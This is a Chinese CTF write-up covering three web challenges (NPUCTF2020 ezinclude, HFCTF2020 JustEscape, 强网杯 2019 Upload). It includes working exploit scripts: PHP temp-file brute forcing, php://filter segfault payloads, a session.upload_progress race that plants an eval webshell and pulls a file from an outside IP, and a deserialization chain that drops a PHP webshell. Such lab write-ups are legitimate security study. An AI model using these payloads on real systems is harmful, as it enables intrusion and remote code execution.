[NPUCTF2020]ezinclude 知识点:文件包含的一些getshell姿势https://coomrade.github.io/2018/10/26/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E4%B8%80%E4%BA%9Bgetshell%E5%A7%BF%E5%8A%BF/
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html?tdsourcetag=s_pcqq_aiomsg
上传成功后,我们就可以进行文件名的爆破,tmp file的文件名是有规律的,都叫/tmp/php再加上6位的大小写字母加上数字的随机组合,这个爆破量比较大,但是是可行的,贴个exp
import string,requests,threading,Queuecharset = string.digits + string.letters host = "123.207.99.17" port = 80 base_url = "http://%s:%d" % (host, port) def get_ready (): queue=Queue.Queue() for i in charset: for j in charset: for k in charset: for l in charset: for m in charset: for n in charset: filename = i + j + k + l + m + n print 'putting ' +filename queue.put(filename) workers=[] for t in range(30 ): worker=threading.Thread(target=get,args=(queue,)) worker.start() workers.append(worker) for worker in workers: worker.join() def get (queue ): try : while queue.qsize()!=0 : filename=queue.get(block=False ) brute_force_tmp_files(filename) except Exception as e: print e def brute_force_tmp_files (filename ): url = "%s/include.php?file=/tmp/php%s" % ( base_url, filename) print url try : response = requests.get(url,timeout=2 ) if len(response.content)!=0 : print "[+] Include success!" with open('success.txt' ,'a' ) as f: f.write(filename+'\r\n' ) return True except Exception as e: print e return False def main (): get_ready() if __name__ == "__main__" : main()
php7 segment fault预期解的话就是扫目录,可以发现dir.php。这个列出了/tmp下面的所有文件。可以用php7 segment fault特性。
向PHP发送含有文件区块的数据包时,让PHP异常崩溃退出,POST的临时文件就会被保留
php < 7.2php://filter/string.strip_tags/resource=/etc/passwd
php7 老版本通杀php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA
import requestsfrom io import BytesIOurl="http://f0af8aa4-9e9c-40a8-9003-175dbc6f69f8.node3.buuoj.cn/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd" payload="<?php phpinfo();?>" files={ "file" :BytesIO(payload.encode()) } r=requests.post(url=url,files=files,allow_redirects=False ) print(r.text)
session.upload_progressphp版本是7.0.33,大于5.4,可以尝试利用session.upload_progress进行session文件包含:
import ioimport requestsimport threadingimport timeburp0_headers = {"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" , "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" } sessid = 'upload' payload = '/tmp/sess_' + sessid data = { 'cf' : payload, "cmd" :"echo '11111111111';copy('http://47.94.0.250/2.txt','/tmp/mc');" } poy = { 'http' : '127.0.0.1:8080' } url = 'http://c23abde6-a0a1-4078-804d-9ea570d5f263.node4.buuoj.cn/flflflflag.php' def write (session ): while True : f = io.BytesIO(b'a' * 1024 * 50 ) resp = session.post( url, data={'PHP_SESSION_UPLOAD_PROGRESS' : '<?php eval($_POST["cmd"]);?>' }, files={'file' : ('tgao.txt' ,f)}, cookies={'PHPSESSID' : sessid} ,headers=burp0_headers) time.sleep(0.5 ) def read (session ): while True : resp = session.post(url=url+'?file=' +payload,data=data,headers=burp0_headers) time.sleep(0.5 ) print(resp.url) print(resp.text) if 'tgao.txt' in resp.text: print(resp.text) event.clear() else : print("[+++++++++++++]retry" ) if __name__=="__main__" : event=threading.Event() with requests.session() as session: for i in range(1 ,30 ): threading.Thread(target=write,args=(session,)).start() for i in range(1 ,30 ): threading.Thread(target=read,args=(session,)).start() event.set()
我个人需要这样的是!这两种getshell的地方是不是一样的!session那个应该是生成的session的文件!
/tmp目录下生成临时文件 是上传文件的临时文件! 上传的临时文件可能可能session文件放的位置不一样!注意了!🙄
[HFCTF2020]JustEscape 知识点:nodejs vm逃逸 我不熟!太难了! 看师傅门的文章把!像这种题!理解把!也只能看看js的代码了!
报错 Errot().stack
https://blog.csdn.net/qq_43478096/article/details/109231567?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-4.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-4.control
[强网杯 2019]Upload 知识点:php代码审计! <?php namespace app \web \controller ;use think \Controller ;class Profile public $checker; public $filename_tmp; public $filename; public $upload_menu; public $ext; public $img; public $except; } class Register public $checker; public $registed; } $profile = new Profile(); $profile->except = ['index' => 'my_is_upload' ]; $profile->my_is_upload = "upload_img" ; $profile->ext = "122" ; $profile->filename_tmp = "./upload/ea6cf191dc7eec7b0e43199e459204e5/a.php" ; $profile->filename = "./upload/ea6cf191dc7eec7b0e43199e459204e5/my_is_upload.php" ; $register = new Register(); $register->registed = false ; $register->checker = $profile; echo urlencode(base64_encode(serialize($register)));
代码审计的时候很头疼 掉头发! 但是一下子通的感觉太爽了!😋😋😋😋
思路:
通过register类当入口!调用profile类__call方法! 在通过__call方法调用__get方法! 最后回到
$this->{$this->{$name}}($arguments); 调用my_is_upload() 就是调用upload_img方法!
方法内前两个if都绕过了!不执行!直接:
if ($this ->ext) { if (getimagesize($this ->filename_tmp)) { @copy($this ->filename_tmp, $this ->filename); @unlink($this ->filename_tmp); $this ->img="../upload/$this ->upload_menu/$this ->filename" ; $this ->update_img(); }
保证上传的是图片🐎就行!
$profile->filename_tmp = "./upload/ea6cf191dc7eec7b0e43199e459204e5/a.php" ; $profile->filename = "./upload/ea6cf191dc7eec7b0e43199e459204e5/my_is_upload.php" ;
😶😶 不知道为啥 越来越喜欢慢慢看代码了!
